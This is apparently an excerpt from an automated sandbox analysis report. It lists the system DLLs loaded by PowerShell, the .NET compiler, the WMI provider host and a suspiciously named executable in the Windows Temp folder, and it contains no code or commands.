        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: apphelp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ncrypt.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ntasn1.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: icu.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winhttp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: mswsock.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: wshunix.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: dnsapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winrnr.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: nlaapi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: wshbth.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: devobj.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: napinsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptsp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: rsaenh.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptbase.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ntmarta.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: winnsi.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: sspicli.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: schannel.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: msasn1.dll
        Source: C:\Windows\Temp\svczHost.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
